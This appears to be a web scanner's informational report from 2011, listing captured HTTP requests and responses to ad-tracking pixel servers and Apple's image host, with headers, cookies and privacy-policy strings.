GET /Segment.aspx?sid Host: idcs.interclick.com Proxy-Connection: keep-alive Referer: http://www.imiclk.com/cgi User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: T=1; uid=u=8fb5e3ac-83a3-4cca |
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 43 Content-Type: image/gif Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: sgm=9622=734271&9000 X-Powered-By: ASP.NET P3P: policyref="http://www Date: Tue, 12 Jul 2011 20:39:29 GMT GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://image2.pubmatic |
Path: | /AdServer/Pug |
GET /AdServer/Pug?vcode Host: image2.pubmatic.com Proxy-Connection: keep-alive Referer: http://www.imiclk.com/cgi User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: KADUSERCOOKIE=AFFBE250 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 20:40:10 GMT Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2 Set-Cookie: PUBRETARGET=571 Content-Length: 1 P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC" Cache-Control: no-store, no-cache, private Pragma: no-cache Connection: close Content-Type: text/html |
Severity: | Information |
Confidence: | Certain |
Host: | http://images.apple.com |
Path: | /global/nav/styles |
GET /global/nav/styles Host: images.apple.com Proxy-Connection: keep-alive Referer: http://www.apple.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|26E72CC1 If-None-Match: "2930-4a3055a8a0000" If-Modified-Since: Wed, 11 May 2011 19:48:16 GMT |
HTTP/1.1 304 Not Modified Content-Type: text/css Last-Modified: Wed, 11 May 2011 19:48:16 GMT ETag: "2930-4a3055a8a0000" Cache-Control: max-age=555 Expires: Tue, 12 Jul 2011 18:08:21 GMT Date: Tue, 12 Jul 2011 17:59:06 GMT Connection: close Vary: Accept-Encoding Set-Cookie: ccl=CIcsZEOfgL0sAaZ8 Set-Cookie: geo=US; path=/; domain=.apple.com |
Severity: | Information |
Confidence: | Certain |
Host: | http://images.apple.com |
Path: | /global/scripts/apple |
GET /global/scripts/apple Host: images.apple.com Proxy-Connection: keep-alive Referer: http://www.apple.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|26E72CC1 If-None-Match: "52da-4a36ce1818580" If-Modified-Since: Mon, 16 May 2011 23:19:02 GMT |
HTTP/1.1 304 Not Modified Content-Type: application/x-javascript Last-Modified: Mon, 16 May 2011 23:19:02 GMT ETag: "52da-4a36ce1818580" Cache-Control: max-age=308 Expires: Tue, 12 Jul 2011 18:04:14 GMT Date: Tue, 12 Jul 2011 17:59:06 GMT Connection: close Vary: Accept-Encoding Set-Cookie: ccl=qqRmbycaEdWv2Znm Set-Cookie: geo=US; path=/; domain=.apple.com |
Severity: | Information |
Confidence: | Certain |
Host: | http://images.apple.com |
Path: | /global/scripts |
GET /global/scripts Host: images.apple.com Proxy-Connection: keep-alive Referer: http://www.apple.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|26E72CC1 If-None-Match: "25fd-4a4e72621e9c0" If-Modified-Since: Sat, 04 Jun 2011 18:36:31 GMT |
HTTP/1.1 304 Not Modified Content-Type: application/x-javascript Last-Modified: Sat, 04 Jun 2011 18:36:31 GMT ETag: "25fd-4a4e72621e9c0" Cache-Control: max-age=321 Expires: Tue, 12 Jul 2011 18:04:27 GMT Date: Tue, 12 Jul 2011 17:59:06 GMT Connection: close Vary: Accept-Encoding Set-Cookie: ccl=CYikw9mUNd+Lksdc Set-Cookie: geo=US; path=/; domain=.apple.com |
Severity: | Information |
Confidence: | Certain |
Host: | http://images.apple.com |
Path: | /global/scripts/lib |
GET /global/scripts/lib Host: images.apple.com Proxy-Connection: keep-alive Referer: http://www.apple.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|26E72CC1 If-None-Match: "27df1-49fbc451c6740" If-Modified-Since: Thu, 31 Mar 2011 00:21:09 GMT |
HTTP/1.1 304 Not Modified Content-Type: application/x-javascript Last-Modified: Thu, 31 Mar 2011 00:21:09 GMT ETag: "27df1-49fbc451c6740" Cache-Control: max-age=365 Expires: Tue, 12 Jul 2011 18:05:11 GMT Date: Tue, 12 Jul 2011 17:59:06 GMT Connection: close Vary: Accept-Encoding Set-Cookie: ccl=/GWqwGkzN6Ws3leo Set-Cookie: geo=US; path=/; domain=.apple.com |
Severity: | Information |
Confidence: | Certain |
Host: | http://images.apple.com |
Path: | /global/scripts/lib |
GET /global/scripts/lib Host: images.apple.com Proxy-Connection: keep-alive Referer: http://www.apple.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|26E72CC1 If-None-Match: "1cf46-44d159ddcfc40" If-Modified-Since: Tue, 13 May 2008 05:05:45 GMT |
HTTP/1.1 304 Not Modified Content-Type: application/x-javascript Last-Modified: Tue, 13 May 2008 05:05:45 GMT ETag: "1cf46-44d159ddcfc40" Cache-Control: max-age=466 Expires: Tue, 12 Jul 2011 18:06:52 GMT Date: Tue, 12 Jul 2011 17:59:06 GMT Connection: close Vary: Accept-Encoding Set-Cookie: ccl=LvsMZVBspvaW4BUP Set-Cookie: geo=US; path=/; domain=.apple.com |
Severity: | Information |
Confidence: | Certain |
Host: | http://images.apple.com |
Path: | /global/scripts/search |
GET /global/scripts/search Host: images.apple.com Proxy-Connection: keep-alive Referer: http://www.apple.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|26E72CC1 If-None-Match: "230-4a05bce73b440" If-Modified-Since: Thu, 07 Apr 2011 22:41:13 GMT |
HTTP/1.1 304 Not Modified Content-Type: application/x-javascript Last-Modified: Thu, 07 Apr 2011 22:41:13 GMT ETag: "230-4a05bce73b440" Cache-Control: max-age=529 Expires: Tue, 12 Jul 2011 18:07:55 GMT Date: Tue, 12 Jul 2011 17:59:06 GMT Connection: close Vary: Accept-Encoding Set-Cookie: ccl=uBJRarGVcixAAGSJ Set-Cookie: geo=US; path=/; domain=.apple.com |
Severity: | Information |
Confidence: | Certain |
Host: | http://images.apple.com |
Path: | /global/styles/base.css |
GET /global/styles/base.css HTTP/1.1 Host: images.apple.com Proxy-Connection: keep-alive Referer: http://www.apple.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|26E72CC1 If-None-Match: "7d0c-4a28e6fd30a00" If-Modified-Since: Thu, 05 May 2011 21:55:52 GMT |
HTTP/1.1 304 Not Modified Content-Type: text/css Last-Modified: Thu, 05 May 2011 21:55:52 GMT ETag: "7d0c-4a28e6fd30a00" Cache-Control: max-age=499 Expires: Tue, 12 Jul 2011 18:07:25 GMT Date: Tue, 12 Jul 2011 17:59:06 GMT Connection: close Vary: Accept-Encoding Set-Cookie: ccl=KajDDzf8359RIllN Set-Cookie: geo=US; path=/; domain=.apple.com |
Severity: | Information |
Confidence: | Certain |
Host: | http://images.apple.com |
Path: | /global/styles/itune |
GET /global/styles/itune Host: images.apple.com Proxy-Connection: keep-alive Referer: http://www.apple.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|26E72CC1 If-None-Match: "d46-48f2ddda94180" If-Modified-Since: Wed, 01 Sep 2010 07:44:22 GMT |
HTTP/1.1 304 Not Modified Content-Type: text/css Last-Modified: Wed, 01 Sep 2010 07:44:22 GMT ETag: "d46-48f2ddda94180" Cache-Control: max-age=506 Expires: Tue, 12 Jul 2011 18:07:32 GMT Date: Tue, 12 Jul 2011 17:59:06 GMT Connection: close Vary: Accept-Encoding Set-Cookie: ccl=hbVmdnpxNIgF Set-Cookie: geo=US; path=/; domain=.apple.com |
Severity: | Information |
Confidence: | Certain |
Host: | http://images.apple.com |
Path: | /itunes/home/styles/home |
GET /itunes/home/styles/home Host: images.apple.com Proxy-Connection: keep-alive Referer: http://www.apple.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|26E72CC1 If-None-Match: "8aa-4a4e72621e9c0" If-Modified-Since: Sat, 04 Jun 2011 18:36:31 GMT |
HTTP/1.1 200 OK Last-Modified: Thu, 30 Jun 2011 23:20:56 GMT ETag: "90f-4a6f62728e600" Vary: Accept-Encoding Server: Apache/2.2.3 (Oracle) X-Cached-Time: Fri, 01 Jul 2011 00:29:49 GMT Cteonnt-Length: 2319 Content-Type: text/css Content-Length: 2319 Cache-Control: max-age=339 Expires: Tue, 12 Jul 2011 18:04:45 GMT Date: Tue, 12 Jul 2011 17:59:06 GMT Connection: close Set-Cookie: ccl=1FciQd7giiJFEgv4 Set-Cookie: geo=US; path=/; domain=.apple.com /* heros */ #main .hero { padding-top:76px; padding-bottom:33px; *padding-bottom: 0; border-color: #E5E5E5 #DBDBDB #D2D2D2; background:#fafafa; background:-webkit ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://images.apple.com |
Path: | /itunes/styles/itunes.css |
GET /itunes/styles/itunes.css HTTP/1.1 Host: images.apple.com Proxy-Connection: keep-alive Referer: http://www.apple.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|26E72CC1 If-None-Match: "1c2a-4a4fc3ffb72c0" If-Modified-Since: Sun, 05 Jun 2011 19:46:59 GMT |
HTTP/1.1 304 Not Modified Content-Type: text/css Last-Modified: Sun, 05 Jun 2011 19:46:59 GMT ETag: "1c2a-4a4fc3ffb72c0" Cache-Control: max-age=466 Expires: Tue, 12 Jul 2011 18:06:52 GMT Date: Tue, 12 Jul 2011 17:59:06 GMT Connection: close Vary: Accept-Encoding Set-Cookie: ccl=kzcWN2xwscEDNLz4LsP8A Set-Cookie: geo=US; path=/; domain=.apple.com |
Severity: | Information |
Confidence: | Certain |
Host: | http://leadback |
Path: | /adcedge/lb |
GET /adcedge/lb?site=695501 Host: leadback.advertising.com Proxy-Connection: keep-alive Referer: http://www.imiclk.com/cgi User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ACID=qw280013054845430029 |
HTTP/1.1 200 OK Connection: close Date: Tue, 12 Jul 2011 20:39:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV Set-Cookie: C2=YELHOFJwAob0FYVsK Set-Cookie: GUID=MTMxMDUwMzE5Mjs Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ Cache-Control: private, max-age=3600 Expires: Tue, 12 Jul 2011 21:39:52 GMT Content-Type: image/gif Content-Length: 49 GIF89a................... |
Severity: | Information |
Confidence: | Certain |
Host: | http://pixel.mathtag.com |
Path: | /data/img |
GET /data/img?mt_id=100036&mt Host: pixel.mathtag.com Proxy-Connection: keep-alive Referer: http://www.imiclk.com/cgi User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: uuid=4dd07bc8-e97b-118c |
HTTP/1.1 200 OK Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x1 pid 0x1b3d 6973 Cache-Control: no-cache Content-Type: image/gif P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Date: Tue, 12 Jul 2011 20:40:11 GMT Etag: 4dd07bc8-e97b-118c-3dec Connection: Keep-Alive Set-Cookie: ts=1310503211; domain=.mathtag.com; path=/; expires=Wed, 11-Jul-2012 20:40:11 GMT Content-Length: 43 GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://pixel.quantserve |
Path: | /pixel |
GET /pixel;r=776749753;fpan=0 Host: pixel.quantserve.com Proxy-Connection: keep-alive Referer: http://www.popcap.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: mc=4dcd4b82-3e074-feeab |
HTTP/1.1 302 Found Connection: close Location: http://www.burstnet.com Set-Cookie: d=EOIAFPaeApll_6ixz4 P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV" Cache-Control: private, no-cache, no-store, proxy-revalidate Pragma: no-cache Expires: Fri, 04 Aug 1978 12:00:00 GMT Content-Length: 0 Date: Tue, 12 Jul 2011 20:39:25 GMT Server: QS |
Severity: | Information |
Confidence: | Certain |
Host: | http://pixel.rubicon |
Path: | /d.php |
GET /d.php?v=1224_1&cb Host: pixel.rubiconproject.com Proxy-Connection: keep-alive Referer: http://www.imiclk.com/cgi User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: au=GNQQ9N2W-FJJG-10.204 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 20:40:10 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.3 P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: rpb=5576%3D1%265421%3D1 Content-Length: 49 Content-Type: image/gif GIF89a................... |
Severity: | Information |
Confidence: | Certain |
Host: | http://pixel.rubicon |
Path: | /tap.php |
GET /tap.php?v=6811&cb Host: pixel.rubiconproject.com Proxy-Connection: keep-alive Referer: http://www.imiclk.com/cgi User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: au=GNQQ9N2W-FJJG-10.204 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 20:39:53 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.3 P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: rpb=5576%3D1%265421%3D1 Set-Cookie: rpx=4212%3D11993%2C1032 Content-Length: 49 Content-Type: image/gif GIF89a................... |
Severity: | Information |
Confidence: | Certain |
Host: | http://r.turn.com |
Path: | /r/beacon |
GET /r/beacon?b2=uAuceuD Host: r.turn.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: adImpCount=jPCRKqrj8 |